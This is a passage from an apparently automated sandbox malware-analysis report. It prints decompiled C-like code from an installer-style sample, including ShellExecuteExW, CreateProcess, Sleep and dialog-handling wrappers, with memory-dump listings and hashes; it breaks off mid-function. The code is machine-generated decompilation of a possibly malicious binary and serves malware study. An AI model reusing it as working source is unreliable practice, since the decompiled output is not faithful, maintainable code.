                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                          • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                          • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                          • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405874 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405874(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}





                                                          0x00405874
                                                          0x00405879
                                                          0x0040587d
                                                          0x00405883
                                                          0x00405889

                                                          APIs
                                                          • ShellExecuteExW.SHELL32(?), ref: 00405883
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID:
                                                          • API String ID: 587946157-0
                                                          • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                          • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                          • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404216(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a208, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                          0x00404224
                                                          0x0040422a

                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                          • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                          • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                          • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004032F5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                          0x00403303
                                                          0x00403309

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00404203(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x4236e4, _a4); // executed
				return _t2;
			}




                                                          0x0040420d
                                                          0x00404213

                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                          • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                          • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                          • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052B0(0xffffffeb, _t7); // executed
				_t9 = E00405831(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066D7(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406193( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                          0x00401f06
                                                          0x00401f0b
                                                          0x00401f11
                                                          0x00401f16
                                                          0x00401f1a
                                                          0x00402885
                                                          0x00401f20
                                                          0x00401f23
                                                          0x00401f26
                                                          0x00401f2e
                                                          0x00401f3d
                                                          0x00401f3f
                                                          0x00401f3f
                                                          0x00401f30
                                                          0x00401f34
                                                          0x00401f34
                                                          0x00401f2e
                                                          0x00401f46
                                                          0x00401f47
                                                          0x00401f47
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                            • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                            • Part of subcall function 004052B0: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,00403233), ref: 0040530B
                                                            • Part of subcall function 004052B0: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp\System.dll), ref: 0040531D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                            • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                            • Part of subcall function 00405831: CreateProcessW.KERNELBASE ref: 0040585A
                                                            • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                            • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                            • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32 ref: 0040670A
                                                            • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                          • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                          • Opcode Fuzzy Hash: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                          • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                          0x004014d7
                                                          0x004014d8
                                                          0x004014e1
                                                          0x004014e4
                                                          0x004014e8
                                                          0x004014e8
                                                          0x004014ea
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                          • Instruction ID: a3662d66bb57f0e4aff7a204df28f74e708ba92ca424d5dc4d08b62f06a02aad
                                                          • Opcode Fuzzy Hash: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                          • Instruction Fuzzy Hash: F6D0A773F141008FD720EBB8BE8945E73F8E7803193208837E102F11D2E578C8528A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                          0x10001225
                                                          0x1000122b

                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E00404C2C(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a248;
				_t282 = 0;
				_v24 =  *0x42a214 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a21d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B7A(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a21c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x4236cc;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x4236e0;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x4236cc = _t282;
								 *0x4236e0 = _t282;
								 *0x42a280 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a21d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404BFA();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x4236e0;
									_t195 =  *0x42a248;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a24c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t282) {
											E00404B35(0x3ff, 0xfffffffb, E00404B4D(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a24c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x4236e0);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
